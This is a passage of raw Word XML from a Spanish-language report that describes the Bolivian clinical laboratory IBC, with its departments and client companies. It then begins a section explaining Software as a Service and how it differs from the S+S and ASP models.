    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Micología</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bacteriología</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Inmunología</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hormonas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00CF0096" w:rsidRDefault="00277259" w:rsidP="00CF0096">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Citogenética Clínica</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:br/>
        <w:t>Los departamentos cuentan con instrumentos modernos de alta precisión y personal con experiencia en su manejo. Todos ellos están auxiliados por el Centro de Registros de Datos a través de un sistema computarizado de última generación.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Nuestros Clientes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>En la actualidad servimos a las siguientes empresas cruceñas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas2"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>Alianza Vida Seguros y Reaseguros S.A. (Oasis)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:br/>
        <w:t>•  Alianza Compañía de Seguros y Reaseguros S.A.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:br/>
        <w:t>•  Bisa Seguros y Reaseguros S.A.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:br/>
        <w:t>•  Banco  de Vida S.R.L.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">•  Banco de Semen (Carlos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>Fuchtner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve"> S.)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:br/>
        <w:t>•  Caja Petrolera de Salud</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:br/>
        <w:t>•  La Vitalicia Seguros y Reaseguros de Vida S.A.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>Seacruz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve"> S.A.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:br/>
        <w:t>•  Sistema Plus Salud S.A.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">•  Servicio de Salud </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>Saguapac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:br/>
        <w:t>•  Nacional Vida Seguros de Personas S.A.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t>Ofrecer el más completo y confiable servicio optimizado con un sistema computarizado de atención de pacientes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00CF0096" w:rsidRDefault="00CF0096" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Trabajo</w:t>
      </w:r>
      <w:r w:rsidR="00277259" w:rsidRPr="00CF0096">
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> de equipo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t xml:space="preserve">El Laboratorio Clínico IBC cuenta con un equipo exitoso y capacitado, valoramos el aporte brindado por cada miembro del equipo, trabajamos de forma global y comprometida para alcanzar metas en común. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t>Teniendo el apoyo de un sistema de información acomodado a sus medidas ya que pueden compartir los datos de sus pacientes entre sus diferentes sucursales y eso brinda una comodidad a la hora de recoger los resultados de sus análisis a sus pacientes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc414243690"/>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B27B46" w:rsidRPr="00BB4EFA" w:rsidRDefault="00B27B46" w:rsidP="00277259">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="31"/>
    <w:p w:rsidR="00CF0096" w:rsidRDefault="00CF0096">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001009B" w:rsidRDefault="0001009B" w:rsidP="0001009B">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc454371299"/>
      <w:r w:rsidRPr="0001009B">
        <w:lastRenderedPageBreak/>
        <w:t>Software Como Servicio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001009B" w:rsidRDefault="004A2DAE" w:rsidP="0001009B">
      <w:r w:rsidRPr="004A2DAE">
        <w:t xml:space="preserve">Software como un Servicio. abreviadamente </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A2DAE">
        <w:t>ScuS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A2DAE">
        <w:t xml:space="preserve"> (del inglés: Software as a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A2DAE">
        <w:t>Service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A2DAE">
        <w:t>, SaaS) es un modelo de distribución de software donde el soporte lógico y los datos que maneja se alojan en servidores de una compañía de tecnologías de información y comunicación (TIC), a los que se accede vía Internet desde un cliente. La empresa proveedora TIC se ocupa del servicio de mantenimiento, de la operación diaria y del soporte del software usado por el cliente. Regularmente el software puede ser consultado en cualquier computador, se encuentre presente en la empresa o no. Se deduce que la información, el procesamiento, los insumos, y los resultados de la lógica de negocio del software, están hospedados en la compañía de TIC.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A2DAE" w:rsidRDefault="004A2DAE" w:rsidP="004A2DAE">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>Características de una Solución SaaS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A2DAE" w:rsidRDefault="004A2DAE" w:rsidP="004A2DAE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2DAE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Las principales características del modelo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>son:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A2DAE" w:rsidRPr="00966700" w:rsidRDefault="004A2DAE" w:rsidP="00966700">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>El software es accesible, manejado y comercializado vía red.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A2DAE" w:rsidRPr="00966700" w:rsidRDefault="004A2DAE" w:rsidP="00966700">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>El mantenimiento y actividades relacionadas con el software se realizan desde un lugar centralizado en lugar de hacerlo en cada cliente, permitiendo a estos acceder a las aplicaciones vía la red.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A2DAE" w:rsidRPr="00966700" w:rsidRDefault="004A2DAE" w:rsidP="00966700">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">La aplicación es distribuida típicamente bajo el modelo de uno-a-muchos, incluyendo su arquitectura, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>management</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, precio y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>partnering</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A2DAE" w:rsidRPr="00966700" w:rsidRDefault="004A2DAE" w:rsidP="00966700">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Generalmente se basa en un modelo de comercialización en el cual no hay un costo inicial, sino un pago por suscripción o por utilización, en el cual no se diferencia la licencia del software del alojamiento del mismo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A2DAE" w:rsidRDefault="004A2DAE" w:rsidP="004A2DAE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2DAE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Estas cuatro características son fundamentales para dife</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">renciarlas de otros modelos que </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2DAE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ofrecen software vía red, como el modelo Software </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">más Servicios (S+S) y el modelo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A2DAE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Appli</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>cation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Providers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ASP). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A2DAE" w:rsidRPr="004A2DAE" w:rsidRDefault="004A2DAE" w:rsidP="004A2DAE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Según</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2DAE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> el modelo de Software más Servicios, utiliza se</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">rvicios alojados en un servidor </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2DAE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>remoto, pero la aplicación principal se instala en el a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">mbiente local del usuario. Este </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2DAE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>modelo no aprovecha completamente la capacidad d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">e cómputo del servidor remoto y </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2DAE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>obliga al cliente a administrar y reservar los recursos necesar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ios para instalar la aplicación </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2DAE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>cliente en sus instalaciones.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001009B" w:rsidRDefault="00966700" w:rsidP="00966700">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>El</w:t>
      </w:r>
      <w:r w:rsidR="004A2DAE" w:rsidRPr="004A2DAE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> modelo ASP comparte con SaaS la caracterís</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">tica principal de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>tercerizar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> el </w:t>
      </w:r>
      <w:r w:rsidR="004A2DAE" w:rsidRPr="004A2DAE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>alojamiento del software en un servidor externo y el acc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">eso utilizando internet, aunque </w:t>
      </w:r>
      <w:r w:rsidR="004A2DAE" w:rsidRPr="004A2DAE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>hay algunas diferencias. La principal diferencia está en la escalabilidad y en el</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>aprovechamiento de los recursos. El modelo ASP fue di</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">señado para alojar aplicaciones </w:t>
      </w:r>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>que utilicen recursos dedicados, por lo que, al aumenta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">r la cantidad de clientes y sus </w:t>
      </w:r>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>requerimientos de hardware, el proveedor estaba obligado a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> reservar los recursos físicos, </w:t>
      </w:r>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">aunque el cliente no los use todos al mismo tiempo ni </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">utilice toda su capacidad. Esto </w:t>
      </w:r>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>muchas veces se hacía inviable para el cliente, ya q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ue debía contratar recursos por </w:t>
      </w:r>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>demás sin saber si los iba a utilizar, con el consiguiente encarecimiento, y para el</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>proveedor, que necesitaba poseer una gran cant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">idad de hardware dedicado. Otro </w:t>
      </w:r>
      <w:r w:rsidRPr="00966700">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>problema para el cliente es que se debe encargar de la</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
